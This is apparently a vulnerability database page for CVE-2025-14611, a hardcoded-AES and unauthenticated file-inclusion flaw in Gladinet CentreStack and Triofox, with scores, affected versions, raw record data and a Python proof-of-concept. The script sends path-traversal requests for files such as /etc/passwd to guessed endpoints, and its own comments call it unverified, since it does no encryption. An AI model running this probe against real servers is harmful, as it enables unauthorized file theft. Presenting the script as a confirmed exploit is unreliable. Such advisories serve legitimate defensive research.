Security Vulnerability Report
CVE-2025-14611 CVSS 9.8 CRITICAL

CVE-2025-14611

Published: 2025-12-12 21:15:53
Last Modified: 2025-12-16 13:48:03
Source: 5dacb0b8-2277-4717-899c-254586fe4912

Description

Gladinet CentreStack and Triofox prior to version 16.12.10420.56791 used hardcoded values for their implementation of the AES cryptoscheme. This degrades security for public exposed endpoints that may make use of it and may offer arbitrary local file inclusion when provided a specially crafted request without authentication. This opens the door for future exploitation and can be leveraged with previous vulnerabilities to gain a full system compromise.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
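CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Note: the score above is the primary CVSS 3.1 assessment in the raw record below. The same record also carries a secondary CVSS 4.0 score of 7.1 (HIGH) with exploit maturity ATTACKED, and CISA Known Exploited Vulnerabilities fields (added 2025-12-15, action due 2026-01-05).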

Configurations (Affected Products)

cpe:2.3:a:gladinet:centrestack:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:gladinet:triofox:*:*:*:*:*:*:*:* - VULNERABLE
Gladinet CentreStack < 16.12.10420.56791
Triofox < 16.12.10420.56791

PoC / Exploit Code

⚠ For Security Research Only
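The following code is for security research and authorized testing only. The listing labels its AES key as an example pattern, never performs any encryption, and uses endpoint paths that the CVE description above does not name, so treat it as an unverified illustration rather than a confirmed reproduction of the flaw.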
python
import requests
import sys

# CVE-2025-14611 PoC - Gladinet CentreStack/Triofox Unauthenticated LFI
# Target: Gladinet CentreStack or Triofox < 16.12.10420.56791
#
# NOTE(review): the CVE text describes hardcoded AES values, but this script
# performs no cryptographic operation. It only forwards a key-shaped string as
# a JSON field. The key is labelled an example pattern and the CVE description
# names no endpoint, so a result from this script is an indication to
# investigate, not proof of exposure.
# Defensive takeaways: per the affected-version line above, builds before
# 16.12.10420.56791 are in scope, so confirm the installed build. Where request
# bodies are inspected, unauthenticated POSTs with repeated "../" in a "path"
# field are worth alerting on.


def exploit_lfi(target_url, filename='/etc/passwd'):
    """Send the same traversal-style JSON request to each candidate path in turn.

    Args:
        target_url: Base URL of the host under test; trailing slashes are
            stripped before a candidate path is appended.
        filename: Value appended to the fixed ``../`` prefix in the JSON
            ``path`` field.

    Returns:
        True as soon as a response has status 200 and its text contains one of
        the marker substrings; False once every candidate has been tried.
    """
    # Example hardcoded key pattern (so labelled by the original listing);
    # it is sent as plain JSON and never used to encrypt anything.
    aes_key = "5A3E7F9B2C1D4E6F8A0B3C5D7E9F1A2B"

    # Paths the original listing calls "commonly affected".
    # NOTE(review): none of them appears in the CVE description; confirm
    # against the vendor advisory before relying on them.
    candidate_paths = (
        '/api/file/read',
        '/api/download',
        '/FileHandler.ashx',
        '/WebDAV/',
        '/api/v1/file',
    )

    request_headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',
        'X-Requested-With': 'XMLHttpRequest',
        'Content-Type': 'application/json',
    }

    # Substring heuristic only: '<?xml' and '<configuration' can occur in
    # ordinary responses, so a match may be a false positive.
    content_markers = ('root:', 'Administrator', '<?xml', '<configuration')

    # The request body is the same for every candidate path.
    body = {
        'path': f'../../../../../../{filename}',
        'encrypted': True,
        'key': aes_key,
    }

    base = target_url.rstrip('/')

    for suffix in candidate_paths:
        probe_url = base + suffix
        try:
            # verify=False turns off TLS certificate validation, so the peer
            # that answers is not authenticated.
            reply = requests.post(
                probe_url,
                json=body,
                headers=request_headers,
                timeout=10,
                verify=False,
            )

            if reply.status_code != 200:
                continue
            if not any(marker in reply.text for marker in content_markers):
                continue

            print(f'[+] VULNERABLE: {probe_url}')
            print('[+] File content preview:')
            print(reply.text[:500])
            return True
        except requests.exceptions.RequestException:
            # Connection or timeout failure: move on to the next candidate.
            continue

    print('[-] Target may not be vulnerable or not reachable')
    return False


if __name__ == '__main__':
    cli_args = sys.argv[1:]
    if not cli_args:
        print('Usage: python cve-2025-14611.py <target_url>')
        print('Example: python cve-2025-14611.py https://victim.com')
        sys.exit(1)

    exploit_lfi(cli_args[0])

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14611", "sourceIdentifier": "5dacb0b8-2277-4717-899c-254586fe4912", "published": "2025-12-12T21:15:53.107", "lastModified": "2025-12-16T13:48:02.743", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Gladinet CentreStack and Triofox prior to version 16.12.10420.56791 used hardcoded values for their implementation of the AES cryptoscheme. This degrades security for public exposed endpoints that may make use of it and may offer arbitrary local file inclusion when provided a specially crafted request without authentication. This opens the door for future exploitation and can be leveraged with previous vulnerabilities to gain a full system compromise."}], "metrics": {"cvssMetricV40": [{"source": "5dacb0b8-2277-4717-899c-254586fe4912", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:H/SI:H/SA:H/E:A/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "ATTACKED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", 
"modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "cisaExploitAdd": "2025-12-15", "cisaActionDue": "2026-01-05", "cisaRequiredAction": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.", "cisaVulnerabilityName": "Gladinet CentreStack and Triofox Hard Coded Cryptographic Vulnerability", "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-798"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gladinet:centrestack:*:*:*:*:*:*:*:*", "versionEndExcluding": "16.12.10420.56791", "matchCriteriaId": "BBE25A56-77B1-415B-A1EB-186627ADF753"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gladinet:triofox:*:*:*:*:*:*:*:*", "versionEndExcluding": "16.12.10420.56791", "matchCriteriaId": "4E01A5DF-260E-4838-9B8C-34F059079DC8"}]}]}], "references": [{"url": "https://www.huntress.com/blog/active-exploitation-gladinet-centrestack-triofox-insecure-cryptography-vulnerability", "source": "5dacb0b8-2277-4717-899c-254586fe4912", "tags": ["Exploit", "Third Party Advisory"]}, {"url": 
"https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-14611", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["US Government Resource"]}]}}